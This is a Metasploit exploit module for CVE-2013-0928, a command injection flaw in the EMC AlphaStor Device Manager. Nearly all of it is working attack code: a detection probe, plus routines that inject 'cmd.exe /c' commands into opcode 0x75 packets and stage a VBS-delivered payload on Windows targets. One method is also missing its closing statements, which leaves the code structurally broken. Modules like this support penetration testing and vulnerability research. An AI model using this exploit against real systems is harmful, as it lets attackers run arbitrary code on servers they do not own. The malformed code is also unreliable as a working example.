EMC AlphaStor Device Manager Opcode 0x75 Command Injection

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

include Msf::Exploit::CmdStager

def initialize(info = {})

super(update_info(info,

'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',

'Description' => %q{

This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75

command, the process does not properly filter user supplied input allowing for arbitrary

command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116

with Windows 2003 SP2 and Windows 2008 R2.

},

'Author' =>

[

'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery

'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module

'Mohsan Farid <faridms[at]gmail.com>', # msf module

'Brent Morris <inkrypto[at]gmail.com>', # msf module

'juan vazquez' # convert aux module into exploit

],

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2013-0928'],

['ZDI', '13-033']

],

'Platform' => 'win',

'Arch' => ARCH_X86,

'Payload' =>

{

'Space' => 2048,

'DisableNops' => true

},

'Targets' =>

[

[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]

],

'CmdStagerFlavor' => 'vbs',

'DefaultTarget' => 0,

'DisclosureDate' => 'Jan 18 2013'))

register_options(

[

Opt::RPORT(3000)

], self.class )

end

def check

packet = "\x75~ mminfo & #{rand_text_alpha(512)}"

res = send_packet(packet)

if res && res =~ /Could not fork command/

return Exploit::CheckCode::Detected

end

Exploit::CheckCode::Unknown

end

def exploit

execute_cmdstager({ :linemax => 487 })

end

def execute_command(cmd, opts)

padding = rand_text_alpha_upper(489 - cmd.length)

packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"

connect

sock.put(packet)

begin

sock.get_once

rescue EOFError

fail_with(Failure::Unknown, "Failed to deploy CMD Stager")

end

disconnect

end

def execute_cmdstager_begin(opts)

if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/

cmd_list.each do |cmd|

cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")

end

def send_packet(packet)

connect

sock.put(packet)

begin

meta_data = sock.get_once(8)

rescue EOFError

meta_data = nil

end

unless meta_data

disconnect

return nil

end

code, length = meta_data.unpack("N*")

unless code == 1

disconnect

return nil

end

begin

data = sock.get_once(length)

rescue EOFError

data = nil

ensure

disconnect

end

data

end